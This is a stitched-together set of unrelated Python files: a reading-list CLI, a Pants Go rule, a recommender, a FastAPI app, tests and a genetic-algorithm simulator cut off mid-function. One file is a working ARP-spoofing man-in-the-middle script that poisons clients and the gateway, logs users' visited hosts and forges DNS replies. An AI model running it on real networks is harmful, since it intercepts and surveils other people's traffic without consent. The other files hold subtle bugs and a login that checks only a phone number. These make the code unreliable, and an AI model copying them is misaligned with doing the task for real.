title, author, year, read_status = book.strip().split(",")
books.append({
'title' : title,
'author': author,
'year' : year,
'read': read_status
})
return books
def show_book(books):
print()
for book in books:
print(f"{book['title']}, by {book['author']} ({book['year']}) - {book['read']}")
print()
def find_books():
matching_books = []
reading_list = get_all_books()
search_term = input("Enter the title name to search the book : ").strip().lower()
for book in reading_list:
if search_term in book['title'].lower():
matching_books.append(book)
return matching_books
def delete_books():
books = get_all_books()
matching_books = find_books()
if matching_books :
books.remove(matching_books[0])
with open("books.csv" , "w") as reading_list:
for book in books:
reading_list.write(f"{book['title']},{book['author']},{book['year']},{book['read']}\n")
else:
print("Sorry, we didn't find any books matching that title.")
def mark_book_as_read():
books = get_all_books()
matching_books = find_books()
if matching_books :
index = books.index(matching_books[0])
books[index]['read'] = 'Read'
with open("books.csv" ,"w") as reading_list:
for book in books :
reading_list.write(f"{book['title']},{book['author']},{book['year']},{book['read']}\n")
else:
print("Not matching book found")
menu_prompt = """Please enter one of the following options:
- 'a' to add a book
- 'd' to delete a book
- 'l' to list the books
- 'r' to mark a book as read
- 's' to search for a book
- 'q' to quit
What would you like to do? """
user_input = input(menu_prompt).strip().lower() #userinput in lower and strip so that it dont count spaces
while user_input != 'q':
if user_input == 'a':
add_books()
elif user_input == 'd':
delete_books()
elif user_input == 'l':
reading_list = get_all_books()
if reading_list:
show_book(reading_list)
else:
print("List is empty")
elif user_input == 'r':
mark_book_as_read()
elif user_input == 's':
matching_books = find_books()
if matching_books:
show_book(matching_books)
else:
print("No matching books found")
else:
print("Input is not valid, please enter again.")
user_input = input(menu_prompt).strip().lower()
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import json
import logging
from dataclasses import dataclass
from pants.backend.go.subsystems.golang import GolangSubsystem
from pants.backend.go.util_rules import go_bootstrap
from pants.backend.go.util_rules.go_bootstrap import GoBootstrap, compatible_go_version
from pants.core.util_rules.environments import EnvironmentTarget
from pants.core.util_rules.system_binaries import (
BinaryNotFoundError,
BinaryPathRequest,
BinaryPaths,
BinaryPathTest,
)
from pants.engine.internals.selectors import Get, MultiGet
from pants.engine.process import Process, ProcessResult
from pants.engine.rules import collect_rules, rule
from pants.util.frozendict import FrozenDict
from pants.util.logging import LogLevel
from pants.util.strutil import bullet_list, softwrap
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class GoRoot:
"""Path to the Go installation (the `GOROOT`)."""
path: str
version: str
_raw_metadata: FrozenDict[str, str]
def is_compatible_version(self, version: str) -> bool:
"""Can this Go compiler handle the target version?"""
return compatible_go_version(compiler_version=self.version, target_version=version)
@property
def full_version(self) -> str:
return self._raw_metadata["GOVERSION"]
@property
def goos(self) -> str:
return self._raw_metadata["GOOS"]
@property
def goarch(self) -> str:
return self._raw_metadata["GOARCH"]
@rule(desc="Find Go binary", level=LogLevel.DEBUG)
async def setup_goroot(
golang_subsystem: GolangSubsystem, go_bootstrap: GoBootstrap, env_target: EnvironmentTarget
) -> GoRoot:
search_paths = go_bootstrap.go_search_paths
all_go_binary_paths = await Get(
BinaryPaths,
BinaryPathRequest(
search_path=search_paths,
binary_name="go",
test=BinaryPathTest(["version"]),
),
)
if not all_go_binary_paths.paths:
raise BinaryNotFoundError(
softwrap(
f"""
Cannot find any `go` binaries using the option `[golang].go_search_paths`:
{list(search_paths)}
To fix, please install Go (https://golang.org/doc/install) with the version
{golang_subsystem.minimum_expected_version} or newer (set by
`[golang].minimum_expected_version`). Then ensure that it is discoverable via
`[golang].go_search_paths`.
"""
)
)
# `go env GOVERSION` does not work in earlier Go versions (like 1.15), so we must run
# `go version` and `go env GOROOT` to calculate both the version and GOROOT.
version_results = await MultiGet(
Get(
ProcessResult,
Process(
(binary_path.path, "version"),
description=f"Determine Go version for {binary_path.path}",
level=LogLevel.DEBUG,
cache_scope=env_target.executable_search_path_cache_scope(),
),
)
for binary_path in all_go_binary_paths.paths
)
invalid_versions = []
for binary_path, version_result in zip(all_go_binary_paths.paths, version_results):
try:
_raw_version = version_result.stdout.decode("utf-8").split()[
2
] # e.g. go1.17 or go1.17.1
_version_components = _raw_version[2:].split(".") # e.g. [1, 17] or [1, 17, 1]
version = f"{_version_components[0]}.{_version_components[1]}"
except IndexError:
raise AssertionError(
f"Failed to parse `go version` output for {binary_path}. Please open a bug at "
f"https://github.com/pantsbuild/pants/issues/new/choose with the below data."
f"\n\n"
f"{version_result}"
)
if compatible_go_version(
compiler_version=version, target_version=golang_subsystem.minimum_expected_version
):
env_result = await Get( # noqa: PNT30: requires triage
ProcessResult,
Process(
(binary_path.path, "env", "-json"),
description=f"Determine Go SDK metadata for {binary_path.path}",
level=LogLevel.DEBUG,
cache_scope=env_target.executable_search_path_cache_scope(),
env={"GOPATH": "/does/not/matter"},
),
)
sdk_metadata = json.loads(env_result.stdout.decode())
return GoRoot(
path=sdk_metadata["GOROOT"], version=version, _raw_metadata=FrozenDict(sdk_metadata)
)
logger.debug(
f"Go binary at {binary_path.path} has version {version}, but this "
f"repository expects at least {golang_subsystem.minimum_expected_version} "
"(set by `[golang].expected_minimum_version`). Ignoring."
)
invalid_versions.append((binary_path.path, version))
invalid_versions_str = bullet_list(
f"{path}: {version}" for path, version in sorted(invalid_versions)
)
raise BinaryNotFoundError(
softwrap(
f"""
Cannot find a `go` binary compatible with the minimum version of
{golang_subsystem.minimum_expected_version} (set by `[golang].minimum_expected_version`).
Found these `go` binaries, but they had incompatible versions:
{invalid_versions_str}
To fix, please install the expected version or newer (https://golang.org/doc/install)
and ensure that it is discoverable via the option `[golang].go_search_paths`, or change
`[golang].expected_minimum_version`.
"""
)
)
def rules():
return (
*collect_rules(),
*go_bootstrap.rules(),
)
|
#!/usr/bin/env python
#-*-coding:utf-8-*-
# @File:Segment.py
# @Author: Michael.liu
# @Date:2019/2/12
# @Desc: NLP Segmentation ToolKit - Hanlp Python Version
import os
import json
import random
import math
class FirstRec:
"""
初始化函数
seed:产生随机的种子
k: 选取的近邻用户个数
nitems 推荐电影
"""
def __init__(self, file_path, seed, k, n_items):
self.file_path = file_path
# self.users_1000 = self.__select_1000_users()
self.seed = seed
self.k = k
self.n_items = n_items
self.train, self.test = self.__load_and_split_data()
def __load_and_split_data(self):
train = dict()
test = dict()
if os.path.exists("../data/train.json") and os.path.exists("../data/test.json"):
print("从文件中加载训练和测试集")
train = json.load(open("../data/train.json"))
test = json.load(open("../data/test.json"))
print("从文件中加载数据完成")
# print(train)
else:
random.seed(self.seed)
for file in os.listdir(self.file_path):
one_path = "{}/{}".format(self.file_path, file)
print("{}".format(one_path))
with open(one_path, "r") as fp:
movieID = fp.readline().split(":")[0]
for line in fp.readlines():
continue
userID, rate, _ = line.split(",")
# 判断用户是否在所选择的1000个用户中
if userID in self.users_1000:
if random.randint(1, 50) == 1:
test.setdefault(userID, {})[movieID] = int(rate)
else:
train.setdefault(userID, {})[movieID] = int(rate)
print("加载完成>>>>>>>>>>>>>>>>>>>")
json.dump(train, open("data/train.json", "w"))
json.dump(test, open("data/test.json", "w"))
return train, test
def pearson(self, rating1, rating2):
sum_xy = 0
sum_x = 0
sum_y = 0
sum_x2 = 0
sum_y2 = 0
num = 0
for key in rating1.keys():
if key in rating2.keys():
num += 1
x = rating1[key]
y = rating2[key]
sum_xy += x * y
sum_x += x
sum_y += y
sum_x2 += math.pow(x, 2)
sum_y2 += math.pow(y, 2)
if num == 0:
return 0
denominator = math.sqrt(sum_x2 - math.pow(sum_x, 2) / num) * math.sqrt(sum_y2 - math.pow(sum_y, 2) / num)
if denominator == 0:
return 0
else:
return (sum_xy - (sum_x * sum_y) / num) / denominator
def recommend(self, userID):
neighborUser = dict()
for user in self.train.keys():
if userID != user:
distance = self.pearson(self.train[userID], self.train[user])
neighborUser[user] = distance
# 字典排序
newNU = sorted(neighborUser.items(), key=lambda k: k[1], reverse=True)
movies = dict()
for (sim_user, sim) in newNU[:self.k]:
for movieID in self.train[sim_user].keys():
movies.setdefault(movieID, 0)
movies[movieID] += sim * self.train[sim_user][movieID]
newMovies = sorted(movies.items(), key=lambda k: k[1], reverse=True)
return newMovies
if __name__ == "__main__":
file_path = "../data/"
seed = 30
k = 15
n_items = 20
f_rec = FirstRec(file_path, seed, k, n_items)
r = f_rec.pearson(f_rec.train["195100"], f_rec.train["1547579"])
print("195100 和 1547579 的皮尔逊相关系数为:{}".format(r))
result = f_rec.recommend("195100")
print("为用户ID为:195100的用户推荐的电影为:{}".format(result))
print("Hello World!")
|
from typing import List
from fastapi import FastAPI, Depends, Body
from sqlalchemy.orm import Session
from app.database import get_database
from app import crud
from app import types
#API main object
app = FastAPI()
#root endpoint
@app.get('/')
def root():
return {
'message':'Welcome on JM mobile application API'
}
#get messages endpoint
@app.get('/messages/', response_model=List[types.Message])
def read_messages(skip: int = 0, limit: int = 100, database: Session = Depends(get_database)):
messages = crud.get_messages(database=database, skip=skip, limit=limit)
return messages
#get users endpoint
@app.get('/users/', response_model=List[types.User])
def read_users(skip: int = 0, limit: int = 100, database: Session = Depends(get_database)):
users = crud.get_users(database=database, skip=skip, limit=limit)
return users
@app.post('/register/')
def register(user: types.User = Body(..., embed=True), database: Session = Depends(get_database)):
exist_user = crud.get_user_by_phone_number(database, user.phone_number)
if exist_user:
return {
'text':'user already exists!',
'user':exist_user
}
db_user = crud.create_user(database, user)
exist_user = crud.get_user_by_phone_number(database, user.phone_number)
return {
'text': 'user created successfully!',
'user': exist_user
}
@app.post('/login/')
def login(phone_number: str = Body(..., embed=True), database: Session = Depends(get_database)):
exist_user = crud.get_user_by_phone_number(database, phone_number)
if exist_user:
return {
'text':'login successfully!',
'user':exist_user
}
return {
'text': 'invalid credental!'
}
|
import numpy as np
import pandas as pd
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt
import matplotlib.collections
def get_similar_producers(budget_revenue_dict, producer_name):
producers_list = budget_revenue_dict["producer_list"];
producer_index_value = producers_list.index(producer_name)
# Creates a data frame consisting of revenue and budget of all the producers for k-means clustering
cluster_data_frame = pd.DataFrame()
cluster_data_frame.insert(0, "budg_of_sel_gen", budget_revenue_dict["budg_of_sel_gen"])
cluster_data_frame.insert(1, "rev_of_sel_gen", budget_revenue_dict["rev_of_sel_gen"])
#creates a k-means cluster
kmeans = KMeans(n_clusters=2).fit(cluster_data_frame)
centroids = kmeans.cluster_centers_
plt.scatter(cluster_data_frame['budg_of_sel_gen'], cluster_data_frame['rev_of_sel_gen'], c= kmeans.labels_.astype(float), s=50, alpha=0.5)
plt.scatter(centroids[:, 0], centroids[:, 1], c='red', s=50)
cluster_map = pd.DataFrame()
cluster_map['data_index'] = cluster_data_frame.index.values
# Findes the cluster of all the producers
cluster_map['cluster'] = kmeans.labels_
# Gets the cluster of input producers
cluster_num=cluster_map['cluster'][producer_index_value]
X=[]
for i in range(0,len(producers_list)):
Z = []
Z.append(budget_revenue_dict["budg_of_sel_gen"][i])
Z.append(budget_revenue_dict["rev_of_sel_gen"][i])
X.append(Z)
# Gets all the points in the cluster given
d = kmeans.transform(X)[:,cluster_num]
# Sorts the points by nearest to the cluster
producer_indexes = np.argsort(d)[::][:10]
return producer_indexes
|
from setuptools import setup, find_packages
import vds
setup(
name='vds',
version=vds.__version__,
url='https://github.com/maet3608/vft-data-sanitizer',
author='Stefan Maetschke',
author_email='stefan.maetschke@gmail.com',
description='Remove sensitive information from visual field test data',
packages=find_packages(),
install_requires=[],
)
|
#!/usr/bin/env python3
import netfilterqueue
import scapy.all as scapy
from scapy.layers import http
import argparse
from threading import *
from time import *
import re
connected_clients = []
blocked_websites = []
file_name = re.sub("\s\d\d:\d\d:\d\d", "", asctime())
log_file = open(os.path.abspath(os.getcwd())+"/Logs/"+file_name+".txt", "a")
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", dest="target", help="Use to specify target IP/IP Range.")
parser.add_argument("-g", "--gateway", dest="gateway_ip", help="Use to specify the gateway IP.")
options = parser.parse_args()
if not options.target:
parser.error("[-] Please specify a target IP/IP Range, use --help for more info.")
if not options.gateway_ip:
parser.error("[-] Please specify the gateway IP, use --help for more info.")
return options
def scan(ip):
global connected_clients
while True:
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
clients_list = []
for element in answered_list:
client_dict = {"ip":element[1].psrc , "mac":element[1].hwsrc}
clients_list.append(client_dict)
connected_clients = [] + clients_list
print_scan_result(connected_clients)
print("\rNumber of Connected Clients: ", len(connected_clients))
sleep(120)
def print_scan_result(results_list):
print("IP\t\t\tMAC Address\n-----------------------------------------")
for client in results_list:
print(client["ip"]+"\t\t"+client["mac"])
def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
return answered_list[0][1].hwsrc
def connect_clients(gateway_ip):
global connected_clients
gateway_mac = get_mac(gateway_ip)
try:
while True:
for client in connected_clients:
packet_1 = scapy.ARP(op=2, pdst=client["ip"], hwdst=client["mac"], psrc=gateway_ip)
packet_2 = scapy.ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=client["ip"])
scapy.send(packet_1,verbose=False)
scapy.send(packet_2,verbose=False)
sleep(2)
except:
print("[!] Restoring ARP Tables......")
for client in connected_clients:
packet_1 = scapy.ARP(op=2, pdst=client["ip"], hwdst=client["mac"], psrc=gateway_ip, hwsrc=gateway_mac)
packet_2 = scapy.ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=client["ip"], hwsrc=client["mac"])
scapy.send(packet_1, count=4, verbose=False)
scapy.send(packet_2, count=4, verbose=False)
def read_blocked_websites():
global blocked_websites
blocked_website_list_file = open("website_list.txt", "r")
for each_website in blocked_website_list_file:
blocked_websites.append(each_website.strip("\n"))
def write_log(url):
log_file.write(asctime()+"\t"+url+"\n\n")
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(http.HTTPRequest):
if scapy_packet[scapy.TCP].dport == 80:
url = "User at ip "+str(scapy_packet[scapy.IP].src) + " Accessed: "+str(scapy_packet[http.HTTPRequest].Host) #+ str(scapy_packet[http.HTTPRequest].Path)
#print(url)
write_log(url)
if scapy_packet.haslayer(scapy.DNSRR):
website_requested = scapy_packet[scapy.DNSQR].qname.decode()
for name in blocked_websites:
if name in website_requested:
print("[+] Blocking Website:",website_requested)
answer = scapy.DNSRR(rrname=website_requested, rdata="10.0.2.14")
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].chksum
del scapy_packet[scapy.UDP].len
packet.set_payload(bytes(scapy_packet))
packet.accept()
def filter_traffic():
print("[+] Reading blocked website list")
try:
read_blocked_websites()
except:
print("[-] Error Occurred, Unable to read file")
else:
print("[+] Website list successfully read")
print(blocked_websites)
while True:
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
try:
options = get_arguments()
scan_network = Thread(target=scan, args=(options.target,), daemon=True)
route_clients = Thread(target=connect_clients, args=(options.gateway_ip,), daemon=True)
network_filter = Thread(target=filter_traffic, daemon=True)
scan_network.start()
route_clients.start()
network_filter.start()
scan_network.join()
route_clients.join()
network_filter.join()
except KeyboardInterrupt:
gateway_mac = get_mac(options.gateway_ip)
print("[!] Restoring ARP Tables......")
for client in connected_clients:
packet_1 = scapy.ARP(op=2, pdst=client["ip"], hwdst=client["mac"], psrc=options.gateway_ip, hwsrc=gateway_mac)
packet_2 = scapy.ARP(op=2, pdst=options.gateway_ip, hwdst=gateway_mac, psrc=client["ip"], hwsrc=client["mac"])
scapy.send(packet_1, count=4, verbose=False)
scapy.send(packet_2, count=4, verbose=False)
print("[+] ARP Tables Restored")
print("[+] Writing Logs to the Memory...........")
log_file.close()
print("[+] Logs Successfully written.......Quitting....")
|
import sys
import re
def process(line):
nums = sorted([int(i) for i in re.findall(r',(\d*);',line)])
l = 0
out = ""
for i in nums:
out += str(i-l)+","
l = i
print out[:-1]
with open(sys.argv[1],'r') as f:
for line in f:
process(line)
|
import os
from qtpy import QtWidgets
from pdsview import pdsview, channels_dialog, band_widget
FILE_1 = os.path.join(
'tests', 'mission_data', '2m132591087cfd1800p2977m2f1.img')
FILE_2 = os.path.join(
'tests', 'mission_data', '2p129641989eth0361p2600r8m1.img')
FILE_3 = os.path.join(
'tests', 'mission_data', '1p190678905erp64kcp2600l8c1.img')
FILE_4 = os.path.join(
'tests', 'mission_data', 'h58n3118.img')
FILE_5 = os.path.join(
'tests', 'mission_data', '1p134482118erp0902p2600r8m1.img')
FILE_6 = os.path.join(
'tests', 'mission_data', '0047MH0000110010100214C00_DRCL.IMG')
test_files = [FILE_1, FILE_2, FILE_3, FILE_4, FILE_5, FILE_6]
FILE_1_NAME = '2m132591087cfd1800p2977m2f1.img'
FILE_2_NAME = '2p129641989eth0361p2600r8m1.img'
FILE_3_NAME = '1p190678905erp64kcp2600l8c1.img'
FILE_4_NAME = 'h58n3118.img'
FILE_5_NAME = '1p134482118erp0902p2600r8m1.img'
FILE_6_NAME = '0047MH0000110010100214C00_DRCL.IMG'
class TestBandWidgetModel(object):
test_images = pdsview.ImageSet(test_files)
window = pdsview.PDSViewer(test_images)
channels_model = channels_dialog.ChannelsDialogModel(window)
model = band_widget.BandWidgetModel(channels_model, 0, 'Test')
def test_init1(self):
test_name = 'Test1'
test_rgb_index = 0
model = band_widget.BandWidgetModel(
self.channels_model, test_rgb_index, test_name)
assert isinstance(model.max_alpha, float)
assert model.max_alpha == 100.
assert isinstance(model.min_alpha, float)
assert model.min_alpha == 0.
assert model._views == set()
assert model.name == test_name
assert model.rgb_index == test_rgb_index
assert model.channels_model == self.channels_model
assert model._index == 0
assert model._alpha_value == model.max_alpha
def test_init2(self):
test_name = 'Test2'
test_rgb_index = 2
model = band_widget.BandWidgetModel(
self.channels_model, test_rgb_index, test_name)
assert isinstance(model.max_alpha, float)
assert model.max_alpha == 100.
assert isinstance(model.min_alpha, float)
assert model.min_alpha == 0.
assert model._views == set()
assert model.name == test_name
assert model.rgb_index == test_rgb_index
assert model.channels_model == self.channels_model
assert model._index == 2
assert model._alpha_value == model.max_alpha
def test_index(self):
assert self.model.index == self.model._index
def test_selected_image(self):
expected_selected_image = self.channels_model.images[self.model.index]
assert self.model.selected_image == expected_selected_image
def test_update_index(self):
assert self.model.index == 0
new_index = 1
new_selected_image = self.channels_model.images[new_index]
self.model.update_index(new_index)
assert self.model.index == new_index
assert self.model.selected_image == new_selected_image
new_index = 0
new_selected_image = self.channels_model.images[new_index]
self.model.index = new_index
assert self.model.index == new_index
assert self.model.selected_image == new_selected_image
def test_alpha_value(self):
assert self.model.alpha_value == self.model._alpha_value
self.model.alpha_value = 50.
assert self.model.alpha_value == 50.
self.model.alpha_value = 100.
assert self.model.alpha_value == 100.
class TestBandWidgetController(object):
test_images = pdsview.ImageSet(test_files)
window = pdsview.PDSViewer(test_images)
channels_model = channels_dialog.ChannelsDialogModel(window)
model = band_widget.BandWidgetModel(
channels_model, 0, 'Test')
controller = band_widget.BandWidgetController(model, None)
def test_init(self):
assert self.controller.model == self.model
assert self.controller.view is None
def test_update_index(self):
assert self.model.index == 0
new_index = 1
self.controller.update_index(new_index, True)
assert self.model.index == new_index
new_index = 0
self.controller.update_index(new_index, True)
assert self.model.index == new_index
def test_reset_index(self):
assert self.model.index == 0
new_index = 1
self.model._index = new_index
self.controller.reset_index()
assert self.model.index == 0
def test_update_alpha_value(self):
assert self.model.alpha_value == 100.
self.controller.update_alpha(50.)
assert self.model.alpha_value == 50.
self.controller.update_alpha(75.)
assert self.model.alpha_value == 75.
self.controller.update_alpha(-1)
assert self.model.alpha_value == 0.
self.controller.update_alpha(-100000)
assert self.model.alpha_value == 0.
self.controller.update_alpha(101)
assert self.model.alpha_value == 100.
self.controller.update_alpha(10000)
assert self.model.alpha_value == 100.
self.controller.update_alpha(0)
assert self.model.alpha_value == 0.
self.controller.update_alpha(100)
assert self.model.alpha_value == 100.
class TestBandWidget(object):
test_images = pdsview.ImageSet(test_files)
window = pdsview.PDSViewer(test_images)
channels_model = channels_dialog.ChannelsDialogModel(window)
model = band_widget.BandWidgetModel(
channels_model, 0, 'Test')
band = band_widget.BandWidget(model)
def check_menu_text(self):
for index, name in enumerate(self.channels_model.image_names):
assert self.band.menu.itemText(index) == name
def test_init(self):
assert self.band.model == self.model
assert isinstance(
self.band.controller, band_widget.BandWidgetController
)
assert isinstance(self.band.menu, QtWidgets.QComboBox)
assert isinstance(self.band.alpha_slider, QtWidgets.QSlider)
assert isinstance(self.band.alpha_value, QtWidgets.QLabel)
assert isinstance(self.band.alpha_label, QtWidgets.QLabel)
assert isinstance(self.band.layout, QtWidgets.QGridLayout)
self.check_menu_text()
assert self.band.alpha_value.text() == str(int(self.model.max_alpha))
assert self.band.alpha_label.text() == 'Test %'
assert self.band.alpha_slider.value() == self.model.max_alpha
def test_add_text_to_menu(self):
self.check_menu_text()
test_names = ['foo', 'bar']
self.band.add_text_to_menu(test_names)
num_names = len(self.channels_model.image_names)
assert self.band.menu.itemText(num_names + 0) == test_names[0]
assert self.band.menu.itemText(num_names + 1) == test_names[1]
self.band.menu.removeItem(num_names + 0)
self.band.menu.removeItem(num_names + 1)
self.check_menu_text()
def test_set_current_index(self):
assert self.band.menu.currentIndex() == 0
self.model.index = 1
self.band.set_current_index()
assert self.band.menu.currentIndex() == 1
self.model.index = 0
self.band.set_current_index()
assert self.band.menu.currentIndex() == 0
def test_image_selected(self):
assert self.model.index == 0
new_index = 1
new_selected_image = self.channels_model.images[new_index]
self.band.image_selected(new_index)
assert self.model.index == new_index
assert self.model.selected_image == new_selected_image
new_index = 0
new_selected_image = self.channels_model.images[new_index]
self.band.image_selected(new_index)
assert self.model.index == new_index
assert self.model.selected_image == new_selected_image
def test_value_changed(self):
assert self.model.alpha_value == 100.
assert self.band.alpha_value.text() == '100'
self.band.alpha_slider.setValue(50.)
assert self.model.alpha_value == 50.
assert self.band.alpha_value.text() == '50'
self.band.alpha_slider.setValue(75.)
assert self.model.alpha_value == 75.
assert self.band.alpha_value.text() == '75'
self.band.alpha_slider.setValue(-1)
assert self.model.alpha_value == 0.
assert self.band.alpha_value.text() == '0'
self.band.alpha_slider.setValue(-100000)
assert self.model.alpha_value == 0.
assert self.band.alpha_value.text() == '0'
self.band.alpha_slider.setValue(101)
assert self.model.alpha_value == 100.
assert self.band.alpha_value.text() == '100'
self.band.alpha_slider.setValue(10000)
assert self.model.alpha_value == 100.
self.band.alpha_slider.setValue(0)
assert self.band.alpha_value.text() == '0'
assert self.model.alpha_value == 0.
self.band.alpha_slider.setValue(100)
assert self.model.alpha_value == 100.
assert self.band.alpha_value.text() == '100'
|
class SWBFConfig:
def __init__(self, filename):
self._filename = filename
self._properties = {}
def __getitem__(self, item):
if item in self._properties:
return self._properties
return None
def __setitem__(self, key, value):
self._properties[key] = value
|
#!usr/bin/env python
# -*- coding:utf-8 -*-
# 稳定版,添加中间数据的持久化,网络高负载情况,增加记录拒绝服务的请求数
import math
import sys
import time
import numpy as np
import random
import simu.greedy as greedy
import simu.greedy_computing as greedy_computing
import simu.greedy_down_bandwidth as greedy_down_bandwidth
import simu.greedy_up_bandwidth as greedy_up_bandwidth
import simu.greedy_resource as greedy_resource
import simu.RandomSelect as random_select
import simu.greedy_bandwidth as greedy_bandwidth
import json
import simu.plot as pt
def check(sr, rbsc, chromosome):
m = np.size(sr, 0)
n = np.size(rbsc, 0)
for i in range(n):
down_bandwidth = 0
up_bandwidth = 0
process = 0
for j in range(m):
try:
down_bandwidth += chromosome[j][i] * sr[j][0]
except:
print(chromosome)
print(sr)
up_bandwidth += chromosome[j][i] * sr[j][1]
process += chromosome[j][i] * sr[j][2]
if down_bandwidth > rbsc[i][0] or up_bandwidth > rbsc[i][1] or process > rbsc[i][2]:
return False
return True
# 那么一个个体应该用M * N的数组表示(要求:每一行只有一个1,每一列请求的资源不能超过基站剩余资源),所有数组应该有L*M*N大小的矩阵表示
def getInitialPopulation(sr, rbsc, populationSize, delta=0.000000001):
m = np.size(sr, 0)
n = np.size(rbsc, 0)
chromosomes_list = []
####################################################################################
cost, rbsc_realtime, solution = greedy_resource.greedy_min_cost(sr, rbsc, delta)
if check(sr, rbsc, solution):
chromosomes_list.append(solution)
populationSize -= 1
cost, rbsc_realtime, solution = greedy.greedy_min_cost(sr, rbsc, delta)
if check(sr, rbsc, solution):
chromosomes_list.append(solution)
populationSize -= 1
cost, rbsc_realtime, solution = greedy_down_bandwidth.greedy_min_down_bandwidth_cost(sr, rbsc, delta)
if check(sr, rbsc, solution):
chromosomes_list.append(solution)
populationSize -= 1
cost, rbsc_realtime, solution = greedy_up_bandwidth.greedy_min_up_bandwidth_cost(sr, rbsc, delta)
if check(sr, rbsc, solution):
chromosomes_list.append(solution)
populationSize -= 1
cost, rbsc_realtime, solution = greedy_computing.greedy_min_compute_cost(sr, rbsc, delta)
if check(sr, rbsc, solution):
chromosomes_list.append(solution)
populationSize -= 1
####################################################################################
for i in range(populationSize):
# 随机产生一个染色体
chromosome = np.zeros((m, n), dtype=int)
rbsc_realtime = np.array(rbsc)
# flag_of_matrix = 1
# 产生一个染色体矩阵中的其中一行
l = np.arange(m)
np.random.shuffle(l)
for j in l:
min_cost_j = sys.maxsize
min_bs_j = -1
for bs_of_select in range(n):
if sr[j][0] < rbsc_realtime[bs_of_select][0] and sr[j][1] < rbsc_realtime[bs_of_select][1] and sr[j][
2] < rbsc_realtime[bs_of_select][2]:
if (sr[j][0] / rbsc_realtime[bs_of_select][0] + sr[j][1] < rbsc_realtime[bs_of_select][1] + sr[j][
2] / rbsc_realtime[bs_of_select][2]) < min_cost_j:
min_cost_j = sr[j][0] / rbsc_realtime[bs_of_select][0] + sr[j][1] < rbsc_realtime[bs_of_select][
1] + sr[j][2] / rbsc_realtime[bs_of_select][2]
min_bs_j = bs_of_select
if min_bs_j != -1:
chromosome[j][min_bs_j] = 1
rbsc_realtime[min_bs_j][0] -= sr[j][0]
rbsc_realtime[min_bs_j][1] -= sr[j][1]
rbsc_realtime[min_bs_j][2] -= sr[j][2]
# 将产生的染色体加入到chromosomes_list中
chromosomes_list.append(chromosome)
chromosomes = np.array(chromosomes_list)
return chromosomes
# 得到个体的适应度值(包括带宽和计算的代价)及每个个体被选择的累积概率
def getFitnessValue(sr, rbsc, chromosomes, delta):
penalty = 10
populations, m, n = np.shape(chromosomes)
# 定义适应度函数,每一行代表一个染色体的适应度,每行包括四部分,分别为:带宽代价、计算代价、总代价、选择概率、累计概率
fitness = np.zeros((populations, 6))
for i in range(populations):
# 取出来第i个染色体
rbsc_realtime = np.array(rbsc)
chromosome = chromosomes[i]
cost_of_down_bandwidth = 0
cost_of_up_bandwidth = 0
cost_of_computing = 0
for j in range(m):
if np.sum(chromosome[j, :]) == 0:
# cost_of_down_bandwidth += penalty
# cost_of_up_bandwidth += penalty
# cost_of_computing += penalty
fitness[i][3] += 30
continue
for k in range(n):
if chromosome[j][k] == 1:
cost_of_down_bandwidth += sr[j][0] / (rbsc_realtime[k][0] + delta)
cost_of_up_bandwidth += sr[j][1] / (rbsc_realtime[k][1] + delta)
cost_of_computing += sr[j][2] / (rbsc_realtime[k][2] + delta)
rbsc_realtime[k][0] -= sr[j][0]
rbsc_realtime[k][1] -= sr[j][1]
rbsc_realtime[k][2] -= sr[j][2]
break
fitness[i][0] = cost_of_down_bandwidth
fitness[i][1] = cost_of_up_bandwidth
fitness[i][2] = cost_of_computing
fitness[i][3] += cost_of_down_bandwidth + cost_of_up_bandwidth + cost_of_computing
# 计算被选择的概率
sum_of_fitness = 0
if populations > 1:
for i in range(populations):
sum_of_fitness += fitness[i][3]
for i in range(populations):
fitness[i][4] = (sum_of_fitness - fitness[i][3]) / ((populations - 1) * sum_of_fitness)
else:
fitness[0][4] = 1
fitness[:, 5] = np.cumsum(fitness[:, 4])
return fitness
# 选择算子
def selectNewPopulation(chromosomes, cum_probability):
populations, m, n = np.shape(chromosomes)
newpopulation = np.zeros((populations, m, n), dtype=int)
# 随机产生populations个概率值
randoms = np.random.rand(populations)
for i, randoma in enumerate(randoms):
logical = cum_probability >= randoma
index = np.where(logical == 1)
# index是tuple,tuple中元素是ndarray
newpopulation[i, :, :] = chromosomes[index[0][0], :, :]
return newpopulation
pass
# 新种群交叉
def crossover(sr, rbsc, population, pc=0.8):
"""
:param rbsc:
:param sr:
:param population: 新种群
:param pc: 交叉概率默认是0.8
:return: 交叉后得到的新种群
"""
populations, m, n = np.shape(population)
random_pop = np.arange(populations)
np.random.shuffle(random_pop)
random_pop = list(random_pop)
# 保存交叉后得到的新种群
updatepopulation = np.zeros((populations, m, n), dtype=int)
while len(random_pop) > 0:
if len(random_pop) == 1:
updatepopulation[populations - 1] = population[random_pop.pop()]
break
a = random_pop.pop()
b = random_pop.pop()
l = len(random_pop)
father = population[a]
mather = population[b]
younger_brother = np.zeros((m, n))
elder_brother = np.zeros((m, n))
# 此处可以增加多次探测
for i in range(m):
p = random.uniform(0, 1)
if p < pc:
younger_brother[i] = mather[i]
elder_brother[i] = father[i]
else:
younger_brother[i] = father[i]
elder_brother[i] = mather[i]
if check(sr, rbsc, younger_brother) and check(sr, rbsc, elder_brother):
continue
else:
temp = elder_brother[i]
elder_brother[i] = younger_brother[i]
younger_brother[i] = temp
if check(sr, rbsc, younger_brother) and check(sr, rbsc, elder_brother):
